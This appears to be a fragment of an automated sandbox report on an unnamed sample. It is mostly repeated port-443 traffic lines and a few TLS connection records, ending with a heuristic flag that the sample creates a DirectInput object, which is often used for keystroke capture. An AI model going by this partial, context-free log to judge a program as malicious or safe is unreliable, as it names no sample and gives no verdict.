Source: unknown Network traffic detected: HTTP traffic on port 57416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56400 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58358
Source: unknown Network traffic detected: HTTP traffic on port 58444 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57609 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58487
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57156
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58489
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56062
Source: unknown Network traffic detected: HTTP traffic on port 55440 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56376 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57394
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57154
Source: unknown Network traffic detected: HTTP traffic on port 55360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57266 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58360
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 57461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58129
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57287
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58014
Source: unknown Network traffic detected: HTTP traffic on port 58639 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57289
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58131
Source: unknown Network traffic detected: HTTP traffic on port 57588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56192
Source: unknown Network traffic detected: HTTP traffic on port 56297 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 55646 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57437 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56582 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58659
Source: unknown Network traffic detected: HTTP traffic on port 56868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56114
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56478
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57567
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57695
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58423
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56245
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56480
Source: unknown Network traffic detected: HTTP traffic on port 55465 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58661
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57330
Source: unknown Network traffic detected: HTTP traffic on port 55752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56504 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55542 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57459
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58553
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57223
Source: unknown Network traffic detected: HTTP traffic on port 57128 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55282
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57461
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55284
Source: unknown Network traffic detected: HTTP traffic on port 59140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55648 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57104
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57588
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58315
Source: unknown Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58317
Source: unknown Network traffic detected: HTTP traffic on port 57394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58681
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56140
Source: unknown Network traffic detected: HTTP traffic on port 57289 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58338 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56141
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57351
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58682
Source: unknown Network traffic detected: HTTP traffic on port 56296 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57590
Source: unknown Network traffic detected: HTTP traffic on port 56168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58487 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58446
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58575
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57244
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57246
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57481
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56272
Source: unknown Network traffic detected: HTTP traffic on port 57024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58573
Source: unknown Network traffic detected: HTTP traffic on port 55438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56270
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57480
Source: unknown Network traffic detected: HTTP traffic on port 57785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55908
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59039
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59038
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58060
Source: unknown Network traffic detected: HTTP traffic on port 57000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58199
Source: unknown Network traffic detected: HTTP traffic on port 58767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58198
Source: unknown Network traffic detected: HTTP traffic on port 56557 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56660 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55804
Source: unknown Network traffic detected: HTTP traffic on port 58681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55802
Source: unknown Network traffic detected: HTTP traffic on port 56192 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59055
Source: unknown Network traffic detected: HTTP traffic on port 55569 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58085
Source: unknown Network traffic detected: HTTP traffic on port 58659 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55933
Source: unknown Network traffic detected: HTTP traffic on port 57102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56453 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58509 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57523 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56088
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58269
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57052
Source: unknown Network traffic detected: HTTP traffic on port 56114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58380
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58381
Source: unknown Network traffic detected: HTTP traffic on port 56556 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59004
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59125
Source: unknown Network traffic detected: HTTP traffic on port 56324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58037
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58153
Source: unknown Network traffic detected: HTTP traffic on port 57695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59123
Source: unknown Network traffic detected: HTTP traffic on port 56920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58510 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57180
Source: unknown Network traffic detected: HTTP traffic on port 57265 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57567 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58039
Source: unknown Network traffic detected: HTTP traffic on port 56452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57545 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55568 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59021
Source: unknown Network traffic detected: HTTP traffic on port 57590 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59023
Source: unknown Network traffic detected: HTTP traffic on port 55908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58291
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59141
Source: unknown Network traffic detected: HTTP traffic on port 59125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59140
Source: unknown Network traffic detected: HTTP traffic on port 56220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58290
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57809
Source: unknown Network traffic detected: HTTP traffic on port 57330 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown Network traffic detected: HTTP traffic on port 58403 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55620
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55621
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55985
Source: unknown Network traffic detected: HTTP traffic on port 56062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55750
Source: unknown Network traffic detected: HTTP traffic on port 58724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58083 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57547 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55517
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56608
Source: unknown Network traffic detected: HTTP traffic on port 56634 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56609
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58902
Source: unknown Network traffic detected: HTTP traffic on port 58290 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58552 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55516
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55880
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55881
Source: unknown Network traffic detected: HTTP traffic on port 57674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56738
Source: unknown Network traffic detected: HTTP traffic on port 56532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58919
Source: unknown Network traffic detected: HTTP traffic on port 58358 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55646
Source: unknown Network traffic detected: HTTP traffic on port 55802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57947
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55648
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56973
Source: unknown Network traffic detected: HTTP traffic on port 58014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56740
Source: unknown Network traffic detected: HTTP traffic on port 58152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57524 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57717
Source: unknown Network traffic detected: HTTP traffic on port 58783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56505
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56868
Source: unknown Network traffic detected: HTTP traffic on port 57719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown Network traffic detected: HTTP traffic on port 58702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55412
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58921
Source: unknown Network traffic detected: HTTP traffic on port 58987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55516 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55829
Source: unknown Network traffic detected: HTTP traffic on port 55984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55700
Source: unknown Network traffic detected: HTTP traffic on port 56713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59072
Source: unknown Network traffic detected: HTTP traffic on port 55620 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55958
Source: unknown Network traffic detected: HTTP traffic on port 56141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56921
Source: unknown Network traffic detected: HTTP traffic on port 58129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56920
Source: unknown Network traffic detected: HTTP traffic on port 56349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57156 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55594 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59089
Source: unknown Network traffic detected: HTTP traffic on port 56140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57332 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57901
Source: unknown Network traffic detected: HTTP traffic on port 55334 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55960
Source: unknown Network traffic detected: HTTP traffic on port 58553 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58530 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59091
Source: unknown Network traffic detected: HTTP traffic on port 56036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56948
Source: unknown Network traffic detected: HTTP traffic on port 58244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56636 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55854
Source: unknown Network traffic detected: HTTP traffic on port 58106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56946
Source: unknown Network traffic detected: HTTP traffic on port 58575 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58618 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56505 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58616
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58618
Source: unknown Network traffic detected: HTTP traffic on port 59091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55465
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57523
Source: unknown Network traffic detected: HTTP traffic on port 58039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58446 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56556
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57524
Source: unknown Network traffic detected: HTTP traffic on port 58423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56557
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55230
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55594
Source: unknown Network traffic detected: HTTP traffic on port 56374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57652
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55596
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56322
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57653
Source: unknown Network traffic detected: HTTP traffic on port 55490 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58509
Source: unknown Network traffic detected: HTTP traffic on port 59004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58869
Source: unknown Network traffic detected: HTTP traffic on port 58704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57418
Source: unknown Network traffic detected: HTTP traffic on port 57459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56686
Source: unknown Network traffic detected: HTTP traffic on port 55284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56324
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:55200 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
